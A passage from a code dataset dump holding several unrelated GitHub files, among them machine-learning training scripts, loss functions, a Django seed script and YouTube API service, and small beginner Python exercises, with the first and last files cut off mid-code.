exact_baseline=exact_baseline,\n anneal=anneal,\n num_episodes=num_episodes,\n num_episodes_noexp=num_episodes_noexp,\n seed=seed,\n env_name=env_name,\n noops=noops,\n movement_reward=movement_reward,\n goal_reward=goal_reward,\n side_effect_reward=side_effect_reward,\n agent_class=agent_with_penalties.QLearningSE)\n rewards.extend(reward)\n performances.extend(performance)\n seeds.extend([seed] * (num_episodes + num_episodes_noexp))\n episodes.extend(list(range(num_episodes + num_episodes_noexp)))\n if mode == 'save':\n d = {'reward': rewards, 'performance': performances,\n 'seed': seeds, 'episode': episodes}\n df = pd.DataFrame(d)\n df1 = add_smoothed_data(df)\n f = filename(env_name, noops, dev_measure, dev_fun, baseline, beta,\n value_discount, path=path, suffix=suffix, seed=seed)\n df1.to_csv(f)\n return reward, performance\n\n\ndef _smooth(values, window=100):\n return values.rolling(window,).mean()\n\n\ndef add_smoothed_data(df, groupby='seed', window=100):\n grouped = df.groupby(groupby)[['reward', 'performance']]\n grouped = grouped.apply(_smooth, window=window).rename(columns={\n 'performance': 'performance_smooth', 'reward': 'reward_smooth'})\n temp = pd.concat([df, grouped], axis=1)\n return temp\n\n\ndef main(unused_argv):\n reward, performance = run_experiment(\n baseline=FLAGS.baseline,\n dev_measure=FLAGS.dev_measure,\n dev_fun=FLAGS.dev_fun,\n discount=FLAGS.discount,\n value_discount=FLAGS.value_discount,\n beta=FLAGS.beta,\n nonterminal=FLAGS.nonterminal,\n exact_baseline=FLAGS.exact_baseline,\n anneal=FLAGS.anneal,\n num_episodes=FLAGS.num_episodes,\n num_episodes_noexp=FLAGS.num_episodes_noexp,\n seed=FLAGS.seed,\n env_name=FLAGS.env_name,\n noops=FLAGS.noops,\n movement_reward=FLAGS.movement_reward,\n goal_reward=FLAGS.goal_reward,\n side_effect_reward=FLAGS.side_effect_reward,\n mode=FLAGS.mode,\n path=FLAGS.path,\n suffix=FLAGS.suffix)\n if FLAGS.mode == 'print':\n print('Performance and reward in the last 10 steps:')\n print(list(zip(performance, reward))[-10:-1])\n\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"deepmind/deepmind-research","sub_path":"side_effects_penalties/run_experiment.py","file_name":"run_experiment.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"1181344067","text":"import hydra\nfrom omegaconf import DictConfig\nfrom pytorch_lightning import Trainer, seed_everything\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping\n\nfrom lightning_wrapper import LightningModel\n\n\n@hydra.main(config_path='conf/config.yaml')\ndef train(cfg: DictConfig):\n \"\"\"Train a pytorch model specified by the config file\"\"\"\n\n seed_everything(cfg.random_seed)\n\n model = LightningModel(cfg)\n\n train_cfg = cfg.training\n checkpoint_callback = ModelCheckpoint(save_top_k=train_cfg.save_ckpts,\n monitor=train_cfg.monitor,\n mode=train_cfg.mode)\n early_stop_callback = EarlyStopping(monitor=train_cfg.monitor,\n patience=train_cfg.patience,\n mode=train_cfg.mode)\n\n trainer = Trainer(max_epochs=train_cfg.epochs,\n gpus=cfg.gpus,\n deterministic=True,\n checkpoint_callback=checkpoint_callback,\n early_stop_callback=early_stop_callback)\n trainer.fit(model)\n\n # test best\n best = list(trainer.checkpoint_callback.best_k_models.keys())[-1]\n best_model = model.load_from_checkpoint(best)\n trainer.test(best_model)\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"yolomeus/DL2020Miniproject","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21611861785","text":"from youtube.config.settings.django import YOUTUBE_SEARCH_URL\nimport json\nimport requests\nfrom videos.models import Video, APIKey\nfrom rest_framework import permissions, response, status\nimport logging\nfrom datetime import datetime\nfrom threading import Thread\nfrom videos.task import search_videos\nimport time\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger()\n\n\nclass YoutubeVideoService:\n # Method to get YouTube API key\n @classmethod\n def get_api_key(cls):\n try:\n api_key = APIKey.objects.get(in_use=True, is_exhausted=False)\n if cls.is_api_key_exhausted(api_key.key):\n api_key.is_exhausted = True\n api_key.in_use = False\n api_key.save()\n logger.info(\"API key is exhausted, getting new API key\")\n return cls.get_new_api_key()\n else:\n return api_key.key\n except APIKey.DoesNotExist:\n logger.info(\"No API key available, all API keys are exhausted\")\n\n # Method to get new YouTube API key, if the current API key is exhausted\n @classmethod\n def get_new_api_key(cls):\n new_api_key = APIKey.objects.filter(is_exhausted=False).first()\n if new_api_key:\n new_api_key.in_use = True\n new_api_key.save()\n return new_api_key.key\n else:\n logger.info(\"No API key available\")\n\n # Method to check if API key is exhausted\n @classmethod\n def is_api_key_exhausted(cls, api_key):\n params = {\n \"part\": \"snippet\",\n \"q\": \"cricket\",\n \"key\": api_key,\n \"maxResults\": 10,\n \"order\": \"date\",\n \"fields\": \"items(id(videoId),snippet(publishedAt,thumbnails,title,description))\",\n \"publishedAfter\": datetime.utcfromtimestamp(\n (datetime.now().timestamp())\n ).strftime(\"%Y-%m-%dT%H:%M:%S.0Z\"),\n }\n videos = json.loads(\n requests.request(\"GET\", YOUTUBE_SEARCH_URL, params=params).text\n )\n if videos.get(\"error\"):\n return True\n return False\n\n # Method to fetch latest videos from YouTube and save in the database at an interval of 1 minute\n @classmethod\n def save_youtube_videos(cls):\n while True:\n time.sleep(60)\n api_key = cls.get_api_key()\n Thread(target=search_videos, args=(api_key,)).start()\n\n # Method to renew exhausted YouTube API key\n @classmethod\n def renew_api_key(cls):\n while True:\n time.sleep(86400)\n api_keys = APIKey.objects.filter(is_exhausted=True)\n for api_key in api_keys:\n time_elapsed = (\n datetime.now().timestamp() - api_key.updated_at.timestamp()\n )\n if time_elapsed >= 86400:\n api_key.is_exhausted = False\n api_key.save()\n logger.info(\"API key renewed\")\n","repo_name":"Nishant127/youtube-api","sub_path":"youtube/apps/videos/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"73668852908","text":"import numpy as np\nfrom keras.models import Model\nfrom keras import backend as K\nimport json\nfrom keras.layers import Input, Conv2D, ZeroPadding2D, concatenate, MaxPooling2D, \\\n AveragePooling2D, Dense, Activation, BatchNormalization, GlobalAveragePooling2D, Dropout\nfrom op_library import concat, conv, sp_conv, dw_conv, reduction\n\n\nclass ModelConstructor(object):\n def __init__(self, arc_json, nn_json):\n self.arch = json.loads(arc_json)\n nn_config = json.loads(nn_json)\n self.num_layers = nn_config['num_layers']\n self.input_sizes = nn_config['input_sizes']\n self.output_size = nn_config['output_sizes'][-1]\n self.embedding = nn_config['embedding']\n\n def build_model(self):\n # a list of the data all layers\n all_layers = [0 for _ in range(self.num_layers + 1)]\n # a list of all the dimensions of all layers\n all_dims = [0 for _ in range(self.num_layers + 1)]\n\n # ================= Stacking layers =================\n # Input Layer. Layer 0\n input_layer = Input(shape=self.input_sizes)\n all_layers[0] = input_layer\n\n # Intermediate Layers. Starting from layer 1.\n for l in range(1, self.num_layers + 1):\n input_layers = list()\n opt = self.arch[l - 1][0]\n opt_config = self.embedding[str(opt)]\n skip = self.arch[l - 1][1:l+1]\n\n # set up the connection to the previous layer first\n input_layers.append(all_layers[l - 1])\n\n # then add skip connections\n for i in range(l - 1):\n if l > 1 and skip[i] == 1:\n input_layers.append(all_layers[i])\n\n layer_input = concat(input_layers)\n if opt_config['opt_type'] == 'convolution':\n layer_output = conv(layer_input, opt_config)\n if opt_config['opt_type'] == 'separable_convolution':\n layer_output = sp_conv(layer_input, opt_config)\n if opt_config['opt_type'] == 'depthwise_convolution':\n layer_output = dw_conv(layer_input, opt_config)\n elif opt_config['opt_type'] == 'reduction':\n layer_output = reduction(layer_input, opt_config)\n\n all_layers[l] = layer_output\n\n # Final Layer\n # Global Average Pooling, then Fully connected with softmax.\n avgpooled = GlobalAveragePooling2D()(all_layers[self.num_layers])\n dropped = Dropout(0.4)(avgpooled)\n logits = Dense(units=self.output_size,\n activation='softmax')(dropped)\n\n # Encapsulate the model\n self.model = Model(inputs=input_layer, outputs=logits)\n\n return self.model\n","repo_name":"kubeflow/katib","sub_path":"examples/v1beta1/trial-images/enas-cnn-cifar10/ModelConstructor.py","file_name":"ModelConstructor.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":1376,"dataset":"github-code","pt":"37"} +{"seq_id":"1269656767","text":"import os\nimport sys\nimport torch\nimport numpy as np\nimport random\n\n\ndef dice_coeff(pred, target):\n smooth = 1.\n\n p_flat = pred.view(-1) # p is of N,C,H,W\n t_flat = target.view(-1) # t is of N, C, H, W\n intersection = (p_flat * t_flat).sum()\n return ((2. * intersection + smooth) / (p_flat.sum() + t_flat.sum() + smooth)).mean()\n\n\ndef dice_coeff_loss(pred, target):\n return 1 - dice_coeff(pred=pred, target=target)\n\n\ndef dice_loss(true, logits, eps=1e-7):\n \"\"\"Computes the Sørensen–Dice loss.\n Note that PyTorch optimizers minimize a loss. In this\n case, we would like to maximize the dice loss so we\n return the negated dice loss.\n Args:\n true: a tensor of shape [B, 1, H, W].\n logits: a tensor of shape [B, C, H, W]. Corresponds to\n the raw output or logits of the model.\n eps: added to the denominator for numerical stability.\n Returns:\n dice_loss: the Sørensen–Dice loss.\n \"\"\"\n num_classes = logits.shape[1]\n if num_classes == 1:\n true_1_hot = torch.eye(num_classes + 1)[true.squeeze(1)]\n true_1_hot = true_1_hot.permute(0, 3, 1, 2).float()\n true_1_hot_f = true_1_hot[:, 0:1, :, :]\n true_1_hot_s = true_1_hot[:, 1:2, :, :]\n true_1_hot = torch.cat([true_1_hot_s, true_1_hot_f], dim=1)\n pos_prob = torch.sigmoid(logits)\n neg_prob = 1 - pos_prob\n probas = torch.cat([pos_prob, neg_prob], dim=1)\n else:\n true_1_hot = torch.eye(num_classes)[true.squeeze(1)]\n true_1_hot = true_1_hot.permute(0, 3, 1, 2).float()\n probas = F.softmax(logits, dim=1)\n true_1_hot = true_1_hot.type(logits.type())\n dims = (0,) + tuple(range(2, true.ndimension()))\n intersection = torch.sum(probas * true_1_hot, dims)\n cardinality = torch.sum(probas + true_1_hot, dims)\n dice_loss = (2. * intersection / (cardinality + eps)).mean()\n return (1 - dice_loss)\n\n\ndef f_beta_loss(pred, gt):\n smooth = 1.\n beta = 2.\n beta_sq = np.square(beta)\n\n p_flat = pred.view(-1)\n g_flat = gt.view(-1)\n\n intersection = (p_flat * g_flat).sum()\n g_backslash_p = ((1 - p_flat) * g_flat).sum()\n p_backslash_g = (p_flat * (1 - g_flat)).sum()\n\n f_beta = (((1 + beta_sq) * intersection + smooth) / (((1 + beta_sq)*intersection) + (beta_sq * g_backslash_p)\n + p_backslash_g + smooth)).mean()\n return 1 - f_beta","repo_name":"Cardio-AI/suture-detection-pytorch","sub_path":"src/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"13902674019","text":"import logging\nimport os\n\nimport django\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.contrib.auth.hashers import make_password\n\nlogger = logging.getLogger(__name__)\n\n\ndef seed_data():\n from zconnect.testutils.factories import (\n UserFactory, DeviceSensorFactory, SensorTypeFactory,\n DeviceFactory, ProductTagsFactory,\n EventDefinitionFactory, BilledOrganizationFactory,\n )\n from django_demo.testutils.factories import FridgeFactory\n\n product = FridgeFactory()\n\n ProductTagsFactory(\n tag=\"fridge\",\n product=product,\n )\n\n low_temp_boundary = 4\n EventDefinitionFactory(\n product=product,\n ref=\"low box temp\",\n condition=\"process_box_temp<{}\".format(low_temp_boundary),\n actions={\n \"activity\" : {\n \"verb\": \"reported\",\n \"description\": \"Fridge temp is too cold. Less than {}°C\".format(low_temp_boundary),\n \"severity\": 20,\n \"category\": \"business metrics\",\n \"notify\": True\n },\n },\n debounce_window=1, # very short debounce!\n )\n EventDefinitionFactory(\n product=product,\n ref=\"door opened\",\n condition=\"property_door_opened==1\",\n actions={\n \"activity\" : {\n \"verb\": \"reported\",\n \"description\": \"Fridge door has been opened\",\n \"severity\": 20,\n \"category\": \"business metrics\",\n \"notify\": True\n },\n },\n debounce_window=1, # very short debounce!\n )\n EventDefinitionFactory(\n product=product,\n ref=\"door opened\",\n condition=\"property_cold_pipe_leak==1\",\n actions={\n \"activity\" : {\n \"verb\": \"reported\",\n \"description\": \"Fresh cooling liquid pipe is leaking\",\n \"severity\": 20,\n \"category\": \"business metrics\",\n \"notify\": True\n },\n },\n debounce_window=1, # very short debounce!\n )\n EventDefinitionFactory(\n product=product,\n ref=\"door opened\",\n condition=\"property_hot_pipe_leak==1\",\n actions={\n \"activity\" : {\n \"verb\": \"reported\",\n \"description\": \"Used cooling liquid pipe leaking\",\n \"severity\": 20,\n \"category\": \"business metrics\",\n \"notify\": True\n },\n },\n debounce_window=1, # very short debounce!\n )\n\n sensor_types = []\n\n # All sensors for fridge product\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_ambient_temp\",\n unit=\"\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_box_temp\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_hot_coolant_temp\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_cold_coolant_temp\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_current_in\",\n unit=\"Amps\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_set_point\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_door_opened\",\n unit=\"\",\n product=product\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_hot_pipe_leak\",\n unit=\"\",\n product=product\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"property_cold_pipe_leak\",\n unit=\"\",\n product=product\n ))\n sensor_types.append(SensorTypeFactory(\n sensor_name=\"process_thermostat\",\n unit=\"°C\",\n product=product,\n aggregation_type=\"mean\"\n ))\n\n fake_org = BilledOrganizationFactory(name=\"fake_org\")\n\n device = DeviceFactory(\n id=123,\n product=product,\n name=\"Fridge simulator\",\n # no fw_version\n online=False,\n sim_number=\"8944538525004714414\",\n )\n device.orgs.add(fake_org)\n\n device_sensor_map = {}\n # Loop over all devices and sensors to create 35 device_sensors\n for sensor_type in sensor_types:\n device_sensor = DeviceSensorFactory(\n device=device,\n resolution=900,\n sensor_type=sensor_type,\n )\n # This key should include the resolution for cases where resolution is not constant\n # across all data, but for this case is it\n device_sensor_map[\"{}:{}\".format(device.id, sensor_type.sensor_name)] = device_sensor\n\n # joe seed\n joe = UserFactory()\n # joe.orgs.add(site1)\n joe.add_org(fake_org)\n\n # admin user\n admin = UserFactory(\n username=\"admin@zoetrope.io\",\n email=\"admin@zoetrope.io\",\n is_superuser=True,\n is_staff=True,\n password=make_password(\"SPITURSTUD\"),\n first_name=\"bart\",\n last_name=\"simpson\",\n )\n\n admin.add_org(fake_org)\n\n\ndef seed_project():\n logger.debug(\"Started seeding data\")\n User = apps.get_model(settings.AUTH_USER_MODEL)\n\n try:\n User.objects.filter(username=\"admin@zoetrope.io\").get()\n except User.DoesNotExist:\n pass\n else:\n if os.getenv(\"DJANGO_SEED_PROJECT_ONCE\"):\n logger.debug(\"Not seeding again\")\n return\n else:\n logger.critical(\"Database has already been seeded - seeding again\")\n\n seed_data()\n\n logger.debug(\"Finished seeding data\")\n\n\nif __name__ == \"__main__\":\n django.setup(set_prefix=False)\n seed_project()\n","repo_name":"zconnect-iot/zconnect-django-demo","sub_path":"django_demo/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8827736225","text":"liste=[1,2,3,4,5]\r\nfor i in liste:\r\n print (i)\r\nprint(range(3,15,3))#range fonksiyonu 3 den baslayarak 15 e kadar 3'er 3'er gider\r\nrange(0,10)#0 dan 10 a kadar ardışık olarak artar\r\n\r\nfor i in range(0,10):\r\n if(i%2==0):\r\n print (i)\r\nstring=\"gollum\"\r\nfor i in string:\r\n print (i)\r\ndemet=(5,3,7,1,7,3,5)\r\nfor i in demet:\r\n print (i*\"*\")\r\n\r\na=0\r\nwhile(a<len(demet)):\r\n print (demet[a])\r\n a=a+1\r\n\r\n","repo_name":"ozguryildiz54/Python-Temel-Seviye-Uygulamalar","sub_path":"Ders-12 For döngüsü.py","file_name":"Ders-12 For döngüsü.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24736907324","text":"import json\nimport os\n\nwith open(\"spotCoordinates.json\", \"w\") as newData:\n newData.write(\"[\")\n\nwith open(\"export.geojson\", 'r') as data:\n spots = json.load(data)\n i=0\n while i < len(spots[\"features\"]):\n #checks if the spot is a point or a polygon, only accepting points as polygons are annoying to handle\n if spots[\"features\"][i][\"geometry\"][\"type\"] == \"Point\":\n with open(\"spotCoordinates.json\", \"a\") as newData:\n newData.write('\\n\\t{')\n try:\n newData.write('\\n\\t\\t\"n\":\"' + str(spots[\"features\"][i][\"properties\"][\"name\"].replace('\"', '').replace(\"'\", \" \")) + '\",') #.replace in case there is a quotation mark in the name of the spot\n except: #if no name has been set\n newData.write('\\n\\t\\t\"n\":\"u\",')#u stands for undefined\n newData.write('\\n\\t\\t\"o\":' + str(spots[\"features\"][i][\"geometry\"][\"coordinates\"][0]) + ',')#longitude\n newData.write('\\n\\t\\t\"a\":' + str(spots[\"features\"][i][\"geometry\"][\"coordinates\"][1]))#latitude\n newData.write('\\n\\t},')\n i+=1\n\n#removing the last line of the file and replacing it bc otherwise there is a coma at the end of the object\nfile_path = \"spotCoordinates.json\"\nos.system('sed -i \"$ d\" {0}'.format(file_path))\n\nwith open(\"spotCoordinates.json\", \"a\") as newData:\n newData.write('\\t}')\n newData.write(\"\\n]\")\n","repo_name":"FrenchGithubUser/Explore-outdoors","sub_path":"cliff_diving/cliff_diving_home/getCoordinates.py","file_name":"getCoordinates.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74652400747","text":"URL = 'https://query1.finance.yahoo.com/v8/finance/chart/'\nSYMBOLS = ['GOOG','AABA','VMW','BABA','HPQ','AAPL','AMZN','FB','IBM','SNAP']\nDEFAULT_REAL_PARAMS = {\n 'range': '1d',\n 'includePrePost': 'false',\n 'interval': '1m',\n 'corsDomain': 'finance.yahoo.com',\n '.tsrc': 'finance'\n }\n\nDEFAULT_HISTORY_PARAMS = {\n 'formatted':'true',\n 'crumb':'S7Z32GyvUii',\n 'lang':'en-US',\n 'region':'US',\n 'interval':'1d',\n 'events':'div|split',\n 'range':'1y',\n 'corsDomain':'finance.yahoo.com'\n}\n\nPROXY_POOL_URL = 'http://localhost:5555/random'\nDEFAULT_HEADERS = {\n 'User - Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.168 Safari/537.36',\n }\n","repo_name":"hengshaochen/airline_booking_system","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5944330607","text":"def hello_world(num1, num2): ### num1 = 36 , num2 = 77\n sum = num1 + num2 ### sum = 36 + 77 \n return sum ### return 113\n\ndef sub(num1, num2): ### num1 = 36 , num2 = 77\n sub = num1 - num2 ### sum = 36 + 77 \n return sub\n\ndef get_value():\n num = int(input('Enter a value')) \n return num\n\nval1 = get_value() ### val1 = 36\nval2 = get_value() ### val2 = 77\n\nanswer = hello_world(val1, val2) ### hello_world(36, 77) answer = 113\nprint('The answer of addition is ' + str(answer)) \n\n\nanswer = sub(val1, val2) ### hello_world(36, 77) answer = 113\nprint('The answer of subtraction is ' + str(answer))","repo_name":"Saketg9/python-repo","sub_path":"function4.py","file_name":"function4.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14267298138","text":"import setuptools\n\nwith open(\"README.md\") as f:\n README = f.read()\n\nsetuptools.setup(\n author=\"Sandro Bolanos\",\n author_email=\"bsandrojavier@gmail.com\",\n name=\"api\",\n url = \"www.colosoft.com.co\",\n description=\"interfaces del sistema\",\n version=\"1.0\",\n long_description = README, \n packages= setuptools.find_namespace_packages(), \n zip_safe=False\n)\n\n\n","repo_name":"Moitas500/Proyecto-patrones","sub_path":"componentes/api/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40685707436","text":"import torch\nimport torch.nn.functional as F\nimport data_loader\nfrom torch_geometric.data import DataLoader\nimport numpy as np\nimport time\nimport copy\nimport os\nimport model\n\n\nmax_nodes = 400\nbatch_size = 250\nnum_class = 345\ninput_chanel = 3\nhidden_chanel = 512\nfea_dim = 128\nhidden_chanel2 = 256\nhidden_chanel3 = 512\nout_chanel = 1024\nn_rnn_layer = 2\nnum_epoches = 1\nlearning_rate = 0.001\ndata_dir = '/home/yl/sketchrnn.txt'\nclass_list = '/home/yl/sketchrnn.txt'\ntheta_list = np.load('/home/yl/theta.npy')\ntrain_model_save_dir = '/home/yl/data/train_model/s3net'\nsave_dir = '/home/yl/data/model/s3net.pkl'\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nprint('='*10, 'Initial Setting', '='*10)\nprint('Batch Size: ', batch_size)\nprint('Data_dir: ', data_dir)\nprint('Input dim: ', input_chanel)\nprint('hidden dim: ', hidden_chanel, ' ', hidden_chanel2, ' ', hidden_chanel3)\nprint('Output dim: ', out_chanel)\nprint('RNN Layers: ', n_rnn_layer)\nprint('Num epochs:', num_epoches)\nprint('Learning rate: ', learning_rate)\nprint('Data_dir :', data_dir)\nprint('Class info: ', class_list)\nprint('Device: ', device)\nprint('Train model save dir: ', train_model_save_dir)\nprint('Final model save path: ', save_dir)\n\n\n\"\"\"\n dataset and data loader\n\"\"\"\nprint('='*10, 'Start Data Loading', '='*10)\ntrain_dataset = data_loader.QuickDraw(data_dir, class_list, theta_list, type='train')\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\nval_dataset = data_loader.QuickDraw(data_dir, class_list, theta_list, type='valid')\nval_loader = DataLoader(val_dataset, batch_size=batch_size, shuffle=True)\nprint('='*10, 'Data Loaded', '='*10)\n\n\n\"\"\"\n model and optimizer\n\"\"\"\n\nmodel = model.Net(input_chanel, hidden_chanel, fea_dim, hidden_chanel2, hidden_chanel3, out_chanel, num_class, n_rnn_layer).to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\nmodel.load_state_dict(torch.load('/home/yl/data/train_model/s3net/4.pkl'))\n\n\ntrain_loss = []\ntrain_acc = []\nvalid_loss = []\nvalid_acc = []\nbest_acc = 0.0\n\nprint('='*10, 'Start training', '='*10)\n\nfor epoch in range(num_epoches):\n # print('=' * 10, 'Epoch ', epoch, '=' * 10)\n # if epoch == 5:\n # optimizer.param_groups[0]['lr'] = 1e-4\n # if epoch == 10:\n # optimizer.param_groups[0]['lr'] = 1e-5\n # if epoch == 15:\n # optimizer.param_groups[0]['lr'] = 1e-6\n print('learning rate: ', optimizer.param_groups[0]['lr'])\n\n since = time.time()\n running_acc = 0.0\n running_loss = 0.0\n val_loss = 0.0\n val_acc = 0.0\n model.train()\n for i, data in enumerate(train_loader):\n inputs = data\n label = data['y'].to(device).long()\n inputs = inputs.to(device)\n optimizer.zero_grad()\n output, prediction, link_loss, ent_loss = model(inputs)\n loss = F.nll_loss(output, label.view(-1)) + link_loss + ent_loss\n loss.backward()\n running_loss += data.y.size(0) * loss.item()\n optimizer.step()\n _, preds = torch.max(output, 1)\n running_acc += torch.sum(preds == label.data)\n if i % 10 == 0:\n print('the {}-th batch, loss: {:.6f}, acc: {:.6f}'.format(i, running_loss / (i*inputs.num_graphs + 1),\n running_acc.double().cpu() / (i*inputs.num_graphs + 1)))\n #return loss_all / len(train_dataset)\n j = running_loss / (len(train_dataset))\n e = running_acc.double().cpu() / (len(train_dataset))\n print('Finish {} epoch, Loss:{:.6f}, Acc:{:.6f}'.format(epoch + 1, j, e))\n train_loss.append(j)\n train_acc.append(e)\n time_epoch = time.time() - since\n print(\"This epoch train costs time:{:.0f}m {:.0f}s\".format(time_epoch // 60, time_epoch % 60))\n\n model.eval()\n loss = 0.0\n for i, data in enumerate(val_loader):\n inputs = data\n label = data['y'].to(device).long()\n inputs = inputs.to(device)\n output, prediction, link_loss, ent_loss = model(inputs)\n loss = F.nll_loss(output, label.view(-1)) + link_loss + ent_loss\n val_loss = val_loss + data.y.size(0) * loss.item()\n _, preds = torch.max(output, 1)\n val_acc += torch.sum(preds == label.data)\n d = val_acc.double().cpu()\n save_path = os.path.join(train_model_save_dir, str(epoch) + '.pkl')\n torch.save(model.state_dict(), save_path)\n c = val_loss / (len(val_dataset))\n f = d / (len(val_dataset))\n if f > best_acc:\n best_acc = f\n best_model_wts = copy.deepcopy(model.state_dict())\n print('val: Loss:{:.6f}, Acc:{:.6f}'.format(c, f))\n valid_loss.append(c)\n valid_acc.append(f)\n time_epoch_val = time.time() - since\n del c, d, f\n print(\"This epoch val costs time:{:.0f}m {:.0f}s\".format(time_epoch_val // 60, time_epoch_val % 60))\n\n\nmodel.load_state_dict(best_model_wts)\ntorch.save(model.state_dict(), save_dir)\nprint('train_loss:{} train_acc:{} val_loss{} val_acc{}'.format(train_loss, train_acc, valid_loss, valid_acc))\n","repo_name":"yanglan0225/s3net","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"29468165500","text":"import requests\n\n\nfrom rest_framework.response import Response\nfrom .models import User\nfrom .serializers import UserSerializer\n\n\nurl = 'http://127.0.0.1:8001/api/owner_users/'\n\n\ndef getUsersList(request):\n users = User.objects.all().order_by('-updated_at')\n serializer = UserSerializer(users, many=True)\n return Response(serializer.data)\n\n\ndef createUser(request):\n data = request.data\n user = User.objects.create(\n name = data['name'],\n email = data['email']\n )\n serializer = UserSerializer(user, many=False)\n\n if serializer:\n requests.get(url)\n return Response(serializer.data)\n\ndef getUserDetail(request, pk):\n users = User.objects.get(id=pk)\n serializer = UserSerializer(users, many=False)\n return Response(serializer.data)\n\n\ndef updateUser(request, pk):\n data = request.data\n user = User.objects.get(id=pk)\n serializer = UserSerializer(instance=user, data=data)\n\n if serializer.is_valid():\n serializer.save()\n requests.get(url)\n\n return Response(serializer.data)\n\n\ndef deleteUser(request, pk):\n user = User.objects.get(id=pk)\n user.delete()\n requests.get(url)\n return Response('User was deleted sucessfully!')\n","repo_name":"gasimovv21/AuctionWebsite-Fullstack-Django_React","sub_path":"users_RestAPI_React/users_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19697937546","text":"import pandas as pd\nimport numpy as np\nimport cobra\n\nfrom pyefm.ElementaryFluxModes import EFMToolWrapper\nfrom tqdm import tqdm\n\nclass EFVWrapper(EFMToolWrapper):\n\n def create_matrices(self, extra_g=None, extra_h=None):\n \"\"\" Initialize the augmented stoichiometric matrix.\n\n extra_g: (n x nr) array\n Extra entries in the constraint matrix. postive values for lower\n bounds, negative values for upper bounds\n extra_h: (n) array\n Corresponding bounds for the extra entries matrix\n\n \"\"\"\n\n # Create stoichiometric matrix, get key dimensions\n N = cobra.util.create_stoichiometric_matrix(self.model)\n nm, nr = N.shape\n self.nm = nm\n self.nr = nr\n\n # Construct full G and h matrices, then drop homogeneous (or near\n # homogeneous) entries\n g_full = np.vstack([np.eye(nr), -np.eye(nr)])\n h_full = np.array([(r.lower_bound, -r.upper_bound)\n for r in self.model.reactions]).T.flatten()\n\n inhomogeneous = ~((h_full <= -1000) | np.isclose(h_full, 0))\n h_full = h_full[inhomogeneous]\n g_full = g_full[inhomogeneous]\n\n if extra_g is not None:\n assert extra_g.shape[1] == nr\n assert extra_g.shape[0] == len(extra_h)\n\n g_full = np.vstack([g_full, extra_g])\n h_full = np.hstack([h_full, extra_h])\n\n G = g_full\n h = h_full\n\n self.nt = nt = len(h)\n\n self.D = np.vstack([\n np.hstack([N, np.zeros((nm, nt)), np.zeros((nm, 1))]),\n np.hstack([G, -np.eye(nt), np.atleast_2d(-h).T])\n ])\n\n def create_model_files(self, temp_dir):\n\n # Stoichiometric Matrix\n np.savetxt(temp_dir + '/stoich.txt', self.D, delimiter='\\t')\n\n # Reaction reversibilities\n np.savetxt(\n temp_dir + '/revs.txt', np.hstack([\n np.array([r.lower_bound < 0 for r in self.model.reactions]),\n np.zeros((self.nt + 1))]),\n delimiter='\\t', fmt='%d', newline='\\t')\n\n # Reaction Names\n r_names = np.hstack([\n np.array([r.id for r in self.model.reactions]),\n np.array(['s{}'.format(i) 